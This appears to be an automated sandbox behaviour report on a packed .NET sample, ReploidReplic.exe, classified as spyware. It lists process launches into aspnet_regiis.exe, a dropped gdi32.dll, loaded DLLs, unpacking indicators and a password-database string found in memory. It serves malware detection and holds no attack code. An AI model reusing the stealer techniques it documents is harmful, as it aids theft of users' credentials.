Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008D2800	2_2_008D2800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008B9820	2_2_008B9820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008C9040	2_2_008C9040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008D8040	2_2_008D8040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008CA050	2_2_008CA050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008C5850	2_2_008C5850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008DC1B0	2_2_008DC1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008C6360	2_2_008C6360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008DF1B0	2_2_008DF1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008C29CD	2_2_008C29CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008B11E9	2_2_008B11E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008E0130	2_2_008E0130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008B6148	2_2_008B6148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008A9140	2_2_008A9140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008BD940	2_2_008BD940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008A6160	2_2_008A6160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008CF166	2_2_008CF166
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008D3960	2_2_008D3960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008B5966	2_2_008B5966
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008C4974	2_2_008C4974
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008A4280	2_2_008A4280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008DEA80	2_2_008DEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008CC282	2_2_008CC282
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008DF2F6	2_2_008DF2F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008CCAF1	2_2_008CCAF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008CCA35	2_2_008CCA35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008CC26C	2_2_008CC26C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008BD260	2_2_008BD260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008C3A60	2_2_008C3A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008C238D	2_2_008C238D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008AEB80	2_2_008AEB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008BC3CC	2_2_008BC3CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008A73C0	2_2_008A73C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008A4BC0	2_2_008A4BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008DF3C0	2_2_008DF3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008D93D0	2_2_008D93D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008C3BE0	2_2_008C3BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008BAB00	2_2_008BAB00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008D7300	2_2_008D7300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008D2B10	2_2_008D2B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008DF330	2_2_008DF330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008CCB4C	2_2_008CCB4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008C6340	2_2_008C6340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008C6360	2_2_008C6360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008C1C80	2_2_008C1C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008BDC90	2_2_008BDC90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008C74A5	2_2_008C74A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008C7CB0	2_2_008C7CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008DF450	2_2_008DF450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008C847D	2_2_008C847D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008D9C70	2_2_008D9C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008AAD90	2_2_008AAD90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008D6DB2	2_2_008D6DB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008B4DC0	2_2_008B4DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008D7DE0	2_2_008D7DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008CFDF9	2_2_008CFDF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008A65F0	2_2_008A65F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008D150E	2_2_008D150E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008DC510	2_2_008DC510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008BD530	2_2_008BD530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008D6554	2_2_008D6554
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008D2D70	2_2_008D2D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008AED75	2_2_008AED75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008BDE90	2_2_008BDE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008A2ED0	2_2_008A2ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008AC6F0	2_2_008AC6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008DFE20	2_2_008DFE20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008BFE7C	2_2_008BFE7C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008B6F8D	2_2_008B6F8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008CF7BC	2_2_008CF7BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008C37D0	2_2_008C37D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008B7FE1	2_2_008B7FE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008BEFE0	2_2_008BEFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008B8740	2_2_008B8740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008C8F6C	2_2_008C8F6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008B4777	2_2_008B4777

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 008B4110 appears 83 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 008A7EE0 appears 44 times

Source: C:\Users\user\Desktop\ReploidReplic.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 1224

Source: ReploidReplic.exe, 00000000.00000000.1734942389.00000000008B0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNathanZacharyEleanor.pdfnN4 vs ReploidReplic.exe
Source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs ReploidReplic.exe
Source: ReploidReplic.exe	Binary or memory string: OriginalFilenameNathanZacharyEleanor.pdfnN4 vs ReploidReplic.exe

Source: ReploidReplic.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ReploidReplic.exe

Static PE information: Section: KzTnD~C ZLIB complexity 1.0003179097347121

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/7@3/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_008D8860 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

2_2_008D8860

Source: C:\Users\user\Desktop\ReploidReplic.exe

File created: C:\Users\user\AppData\Roaming\gdi32.dll

Jump to behavior

Source: C:\Users\user\Desktop\ReploidReplic.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3664:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2312

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\c3ebb3f4-06b7-43fe-9652-fb446222a9c3

Jump to behavior

Source: ReploidReplic.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\ReploidReplic.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: aspnet_regiis.exe, 00000002.00000003.1793435477.0000000005218000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: ReploidReplic.exe

ReversingLabs: Detection: 60%

Source: ReploidReplic.exe	String found in binary or memory: -addpset
Source: ReploidReplic.exe	String found in binary or memory: -addfulltrust
Source: ReploidReplic.exe	String found in binary or memory: -addgroup
Source: ReploidReplic.exe	String found in binary or memory: -help

Source: C:\Users\user\Desktop\ReploidReplic.exe

File read: C:\Users\user\Desktop\ReploidReplic.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ReploidReplic.exe "C:\Users\user\Desktop\ReploidReplic.exe"
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 1224
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ReploidReplic.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\ReploidReplic.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\ReploidReplic.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ReploidReplic.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ReploidReplic.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbo source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: %%.pdb source: ReploidReplic.exe, 00000000.00000002.1888462465.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WER1976.tmp.dmp.5.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER1976.tmp.dmp.5.dr
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: ReploidReplic.exe, 00000000.00000002.1888462465.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\ReploidReplic.PDB source: ReploidReplic.exe, 00000000.00000002.1888462465.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER1976.tmp.dmp.5.dr
Source:	Binary string: \??\C:\Users\user\Desktop\ReploidReplic.PDBB source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000F21000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb\ source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb/ source: ReploidReplic.exe, 00000000.00000002.1888658463.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\ReploidReplic.exe

Unpacked PE file: 0.2.ReploidReplic.exe.800000.0.unpack KzTnD~C:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;

Source: ReploidReplic.exe	Static PE information: section name: KzTnD~C
Source: ReploidReplic.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_0085FA80 push eax; mov dword ptr [esp], 5B5A5908h	0_2_0085FA85
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_008024E8 push esp; retf	0_2_008024E9
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_00803E6C push esi; retf	0_2_00803E6D
Source: C:\Users\user\Desktop\ReploidReplic.exe	Code function: 0_2_008047D2 push ecx; iretd	0_2_008047D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_008DF000 push eax; mov dword ptr [esp], 5B5A5908h	2_2_008DF005

Source: ReploidReplic.exe

Static PE information: section name: KzTnD~C entropy: 7.999695257845116

Source: C:\Users\user\Desktop\ReploidReplic.exe

File created: C:\Users\user\AppData\Roaming\gdi32.dll

Jump to dropped file

Source: C:\Users\user\Desktop\ReploidReplic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ReploidReplic.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
